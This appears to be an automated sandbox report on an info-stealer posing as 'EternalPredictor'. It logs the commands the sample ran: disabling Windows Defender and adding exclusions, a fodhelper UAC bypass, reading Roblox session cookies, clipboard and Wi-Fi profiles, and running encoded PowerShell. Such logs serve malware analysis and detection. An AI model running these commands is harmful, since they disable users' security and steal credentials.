                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\consent.exe consent.exe 6092 324 0000019985E22B80
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: unknown unknown
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline"
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C fodhelper
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
                        Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
                        Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A5B.tmp" "c:\Users\user\AppData\Local\Temp\3pyiazzo\CSC68A32BD75EFB4A1F8C11C6C63FDD8E5.TMP"
                        Source: C:\Windows\System32\fodhelper.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                        Source: C:\Users\user\AppData\Roaming\program.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C679570 cpuid 5_2_00007FF72C679570
                        Source: C:\Users\user\Desktop\EternalPredictor.exeQueries volume information: C:\Users\user\Desktop\EternalPredictor.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\eternal.exeQueries volume information: C:\Users\user\AppData\Roaming\eternal.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\eternal.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_ctypes.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\blank.aes VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_lzma.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeQueries volume information: C:\Users\user\AppData\Roaming\program.exe VolumeInformation
